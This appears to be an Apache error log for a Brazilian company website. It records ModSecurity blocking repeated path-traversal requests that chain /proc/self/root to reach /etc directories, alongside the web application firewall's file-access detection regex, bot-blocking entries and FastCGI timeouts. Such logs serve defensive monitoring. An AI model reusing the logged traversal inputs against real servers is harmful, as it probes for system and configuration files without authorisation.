[Wed Mar 18 00:58:08.401595 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:38830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboi0Na6ubjKNq_cu4ZEqAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:58:15.263048 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:47856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboi19Y0UrI5A3LftIw-YwAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:58:24.149784 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36034] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:58:45.128863 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36534] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:58:47.643637 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:41834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboi9_u8EFLIOrSqIpu3fwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:58:52.282661 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:48186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboi_Na6ubjKNq_cu4ZExwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:59:07.130163 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36924] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:59:31.105834 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37456] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:59:45.896982 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:48196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abojMQkwaGbbGflqUZDCpAAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:59:53.437771 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37910] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:00:08.632070 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.244.43:42944] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abojSNa6ubjKNq_cu4ZE9QAAA0A"]
[Wed Mar 18 01:00:16.109815 2026] [proxy_fcgi:error] [pid 15051:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38346] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:00:21.658367 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:35212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abojVeoXxyEfFpUF8f8cLQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:00:30.358245 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.228.61:59292] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abojXta6ubjKNq_cu4ZFDAAAA0s"]
[Wed Mar 18 01:00:39.125798 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38860] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:01:02.157901 2026] [proxy_fcgi:error] [pid 15051:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39396] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:01:06.239369 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:46052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abojgta6ubjKNq_cu4ZFKAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 01:01:17.702655 2026] [core:alert] [pid 17653:tid 140411683178240] [client 74.7.243.128:48180] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib
[Wed Mar 18 01:01:18.698558 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:53834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abojjta6ubjKNq_cu4ZFNAAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:01:25.125930 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39822] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:01:27.709532 2026] [core:alert] [pid 30077:tid 140411590858496] [client 74.7.243.128:53830] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:01:28.474853 2026] [mime_magic:error] [pid 15051:tid 140411658000128] (70014)End of file found: [client 74.7.241.31:42770] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/systemd
[Wed Mar 18 01:01:47.138395 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40386] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:02:09.119246 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40814] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:02:31.141783 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41236] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:02:54.133791 2026] [proxy_fcgi:error] [pid 19507:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41796] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:03:12.134990 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:60012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abokANY0UrI5A3LftIw--gAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:03:16.137785 2026] [proxy_fcgi:error] [pid 19507:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42324] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:03:17.133067 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:56844] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 01:03:20.727581 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:48392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abokCMdf6f5d65gmYZR_KwAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:03:38.146564 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42822] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:04:01.145781 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43418] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:04:12.856888 2026] [mime_magic:error] [pid 17653:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:8165] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 01:04:24.133798 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43946] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:04:36.951804 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:38942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abokVOoXxyEfFpUF8f8cxAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 01:04:47.133848 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44464] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:04:56.547717 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:48406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abokaNY0UrI5A3LftIw_KAAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:05:05.456299 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:54918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abokccdf6f5d65gmYZR_ggAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:05:08.711574 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.244.43:39844] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abokdNY0UrI5A3LftIw_LgAAAZE"]
[Wed Mar 18 01:05:10.153815 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44924] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:05:10.247066 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:47680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abokdimAPhZkrhU8w4kfigAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:05:32.140371 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45466] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:05:34.430002 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.228.61:52838] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abokjuoXxyEfFpUF8f8c0QAAAUA"]
[Wed Mar 18 01:05:55.125808 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46072] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:05:58.500096 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:47684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abokpgkwaGbbGflqUZDDTwAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:06:18.117787 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46648] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:06:40.126589 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47242] AH01075: Error dispatching request to : (polling)
